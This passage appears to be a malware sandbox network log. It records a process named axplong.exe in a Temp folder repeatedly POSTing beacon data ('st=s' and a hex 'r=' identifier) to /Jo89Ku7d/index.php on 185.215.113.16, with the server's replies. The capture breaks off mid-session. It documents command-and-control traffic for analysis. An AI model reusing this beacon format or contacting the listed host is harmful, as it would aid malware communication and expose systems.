                  Sep 26, 2024 18:30:09.420989990 CEST8049783185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:09.421139956 CEST4978380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.428148985 CEST4978380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.433140039 CEST8049783185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:09.657274008 CEST8049783185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:09.659048080 CEST4978380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.766598940 CEST4978380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.766963005 CEST4978480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.771703959 CEST8049783185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:09.771778107 CEST4978380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.771958113 CEST8049784185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:09.772058010 CEST4978480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.772277117 CEST4978480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:30:09.777107000 CEST8049784185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:10.498146057 CEST8049784185.215.113.16192.168.2.6
                  Sep 26, 2024 18:30:10.498198986 CEST4978480192.168.2.6185.215.113.16
                  • 185.215.113.16
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649720185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:02.924305916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:03.650181055 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:03.652704000 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:03.882004023 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649721185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:04.003832102 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:04.715169907 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:04.716381073 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:04.944526911 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649722185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:05.065445900 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:05.784467936 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:05.785368919 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:06.014287949 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649723185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:06.128329039 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:06.841623068 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:06.842906952 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:07.073262930 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.649724185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:07.190948963 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:07.912728071 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:07.913733959 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:08.141066074 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.649725185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:08.253267050 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:08.942171097 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:08.943064928 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:09.174534082 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.649726185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:09.284492016 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:10.045361042 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:10.046216011 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:10.285099030 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.649727185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:10.393815041 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:11.168631077 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:11.169435024 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:11.398538113 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.649728185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:11.521265984 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:12.247832060 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:12.248661995 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:12.495443106 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.649729185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:12.617435932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:13.351587057 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:13.352613926 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:13.581979036 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.649730185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:13.693623066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:14.480070114 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:14.480901957 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:14.717986107 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.649731185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:14.847330093 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:15.571053028 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:15.572169065 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
